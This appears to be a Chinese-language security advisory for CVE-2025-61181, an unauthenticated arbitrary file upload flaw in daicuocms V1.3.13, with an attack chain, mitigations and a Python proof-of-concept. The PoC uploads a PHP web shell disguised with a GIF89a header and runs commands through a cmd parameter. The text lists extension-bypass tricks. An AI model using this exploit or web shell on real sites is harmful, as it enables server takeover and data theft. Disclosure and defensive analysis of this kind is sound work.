CVE-2025-61181 daicuocms V1.3.13 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-61181

漏洞类型

任意文件上传

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

daicuocms

漏洞概述

CVE-2025-61181是daicuocms内容管理系统V1.3.13版本中存在的一个任意文件上传漏洞。该漏洞位于系统的图片上传功能中，由于服务器端对上传文件的类型和内容校验不足，攻击者可以绕过现有的安全限制，将恶意文件（如Web Shell）上传到服务器，从而实现远程代码执行。

daicuocms是一款基于PHP开发的开源内容管理系统，广泛应用于中小型网站的建设。该系统在图片上传模块中仅依赖客户端或简单的文件扩展名检查来验证上传文件的合法性，未对文件内容、MIME类型以及文件扩展名进行严格的服务器端校验。攻击者可以通过修改请求包中的文件名后缀或Content-Type字段，将PHP、ASP、JSP等可执行脚本伪装成图片文件上传。

该漏洞的CVSS 3.1评分为6.5，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），也无需用户交互（UI:N）。在影响方面，该漏洞对机密性（C:L）和完整性（I:L）存在低影响，但对可用性（A:N）无影响。攻击者成功利用该漏洞后，可以在服务器上执行任意代码，进而获取服务器控制权限、窃取敏感数据或植入持久化后门。由于无需认证即可利用，漏洞的危害面进一步扩大，对暴露在公网上的daicuocms站点构成严重威胁。

技术细节

该漏洞的根本原因在于daicuocms V1.3.13的图片上传功能未对上传文件进行充分的安全验证。具体技术分析如下：

1. **文件类型校验缺陷**：服务器端仅检查了HTTP请求中的Content-Type字段或文件扩展名的白名单，但未对文件的实际内容（魔术字节/Magic Bytes）进行验证。攻击者可以通过伪造Content-Type为image/jpeg、image/png等合法图片类型，绕过类型检查。

2. **扩展名绕过**：上传功能未对文件扩展名进行严格的黑名单过滤或白名单限制。攻击者可以使用双扩展名（如shell.php.jpg）、空字节注入（如shell.php%00.jpg）或大小写绕过（如shell.pHp）等方式绕过简单的扩展名检查。

3. **上传路径可预测**：上传后的文件存储在Web可访问的目录中，攻击者可以通过猜测或直接获取返回的文件路径来访问上传的恶意文件。

4. **利用方式**：攻击者构造一个包含PHP Web Shell代码的图片文件（通过在合法图片中嵌入PHP代码或使用图片马工具生成），然后通过修改HTTP请求的Content-Type和文件名后缀，将其上传到目标服务器。上传成功后，攻击者直接访问该文件的URL即可执行任意PHP代码，实现远程命令执行。

5. **权限要求**：由于漏洞无需认证即可利用（PR:N），攻击者只需通过网络直接向目标站点的图片上传接口发送恶意请求即可完成攻击。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或扫描工具识别目标站点使用的daicuocms V1.3.13版本，并定位图片上传功能的接口地址。

STEP 2

步骤2：构造恶意文件

攻击者制作一个包含PHP Web Shell代码的恶意文件，通过添加GIF89a文件头魔术字节将其伪装成合法的GIF图片，以绕过服务器端的内容类型检查。

STEP 3

步骤3：伪造上传请求

攻击者使用工具（如Burp Suite或自定义脚本）构造HTTP上传请求，将Content-Type设置为image/gif，文件名设置为shell.php等可执行扩展名，向目标上传接口发送恶意请求。

STEP 4

步骤4：绕过校验上传

由于服务器仅检查Content-Type或文件扩展名白名单，未进行文件内容验证，恶意文件成功上传到Web可访问目录。

STEP 5

步骤5：执行恶意代码

攻击者通过浏览器或命令行工具访问上传的恶意文件URL，传入命令参数（如?cmd=id），服务器解析执行其中的PHP代码，返回命令执行结果。

STEP 6

步骤6：获取服务器控制权

攻击者通过Web Shell获取服务器权限，可执行任意系统命令、读取敏感文件、植入持久化后门或进行横向移动，进一步控制整个服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61181 PoC - daicuocms V1.3.13 Arbitrary File Upload
# Exploit: Upload a PHP webshell disguised as an image file

import requests

TARGET_URL = "http://target.com"
UPLOAD_PATH = "/index.php?m=upload&a=upload"  # Adjust based on actual upload endpoint
SHELL_PATH = "/uploads/"

# PHP webshell payload embedded in a GIF file (GIF89a header + PHP code)
# Using GIF89a magic bytes to bypass content-type checks
SHELL_CONTENT = (
    "GIF89a;\n"
    "<?php\n"
    "if(isset($_REQUEST['cmd'])){\n"
    "    echo '<pre>';\n"
    "    system($_REQUEST['cmd']);\n"
    "    echo '</pre>';\n"
    "}\n"
    "?>"
)

def exploit(target_url, upload_endpoint):
    """
    Upload a PHP webshell disguised as a GIF image to daicuocms V1.3.13.
    The server only checks the Content-Type header, not the actual file content.
    """
    # Prepare the malicious file
    files = {
        'file': ('shell.php', SHELL_CONTENT, 'image/gif')
    }

    # Send upload request without authentication
    response = requests.post(
        target_url + upload_endpoint,
        files=files,
        headers={
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
        }
    )

    print(f"[+] Upload Response Status: {response.status_code}")
    print(f"[+] Upload Response Body: {response.text}")

    # Try to access the uploaded shell
    # The shell may be saved with .php extension or original name
    shell_urls = [
        target_url + SHELL_PATH + "shell.php",
        target_url + SHELL_PATH + "shell.php.gif",
        target_url + "/uploads/shell.php",
    ]

    for shell_url in shell_urls:
        check = requests.get(shell_url + "?cmd=id")
        if check.status_code == 200 and ("uid=" in check.text or "www-data" in check.text):
            print(f"[+] Shell accessible at: {shell_url}")
            print(f"[+] Command output: {check.text}")
            return shell_url

    print("[-] Shell not accessible, check upload path manually")
    return None

if __name__ == "__main__":
    print("[*] CVE-2025-61181 - daicuocms V1.3.13 Arbitrary File Upload PoC")
    print(f"[*] Target: {TARGET_URL}")
    exploit(TARGET_URL, UPLOAD_PATH)

影响范围

daicuocms V1.3.13

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过Web服务器配置禁止上传目录的脚本执行权限（如Nginx中配置location ~* /uploads/.*\.(php|php5|phtml)$ { deny all; }）；2）部署WAF规则拦截包含可执行脚本扩展名的上传请求；3）对现有上传的文件进行扫描，清理已上传的Web Shell；4）限制图片上传接口的访问，仅对认证用户开放；5）监控服务器日志，及时发现异常上传行为。